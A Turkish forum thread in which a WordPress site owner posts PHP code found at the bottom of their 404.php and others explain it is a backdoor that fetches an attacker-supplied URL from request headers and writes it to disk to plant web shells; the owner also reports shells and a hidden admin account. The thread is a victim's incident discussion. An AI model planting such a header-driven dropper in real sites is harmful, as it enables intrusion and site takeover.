Wordpress 404.php de bu kodu buldum Hacklendim galiba

Aşağı Git Tüm Forumlar Web Tasarım - Programlama Yazılım Geliştirme PHP / CGI Wordpress 404.php de bu kodu buldum Hacklendim galiba

Bu konudaki kullanıcılar: 1 misafir

4
Cevap 885
Tıklama 0
Öne Çıkarma

1. sayfa

Wordpress 404.php de bu kodu buldum Hacklendim galiba

Cevap Yaz

byyigit

10 yıl

Yüzbaşı

Konu Sahibi

Merhaba,

wordpress blogumun 404.php sinin en altında

quote:

<?php

$ur = $_SERVER['HTTP_ACCEPT'];

$f = $_SERVER['HTTP_ACCEPT_LANGUAGE'];

if (preg_match('/http/i', $ur)) {

$ch = curl_init($ur);

$fp = fopen($f, "w");

curl_setopt($ch, CURLOPT_FILE, $fp);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch); curl_close($ch);fclose($fp);

}

?>

bu konu buldum. Nedir bu acaba ? Ne işlev yapar ?

overpSkpt

10 yıl

Teğmen

HTTP_ACCEPT içerinde http ile başlayan bir şey varsa onu alıp dizine kaydediyor. Büyük ihtimalle shell yüklemek içindir.

byyigit

10 yıl

Yüzbaşı

Konu Sahibi

üstad dizinde 2 tane shell dosyası buldum ve mysql user table da admin yetkileri verilmiş kullanıcı buldum (panelde gözükmüyordu). bunları temizledim. acaba bu http_accept dedigin şey nedir. Bu dizine yollanan dosyalar nerden geliyor serverda biryerde gizlimidir ?

Bu mesaja 1 cevap geldi.

Bu mesajda bahsedilenler: @overpSkpt

overpSkpt

10 yıl

Teğmen

$fp = fopen($f, "w"); bunla bir dosyası sana yazdırıyor içinde de başka çekmek istediği dosyalar vardır büyük ihtimal ya da direkt shell atıp onun üzerinden ilerleyebilir.
daha sonra CURL ile de yüklemek istediği dosya işlemine başlıyor.

CURL genelde dosya indirme işlemlerinde ya da bir sayfayı çağırma işlemlerinde kullanılır.

Bu mesaja 1 cevap geldi.

ahmtbrk58

10 yıl

Yüzbaşı

curl_init yaptığı url önemli aslında ona baksana $ur variablesine

Cevap Yaz

1. sayfa

Tüm Forumlar Web Tasarım - Programlama Yazılım Geliştirme PHP / CGI Wordpress 404.php de bu kodu buldum Hacklendim galiba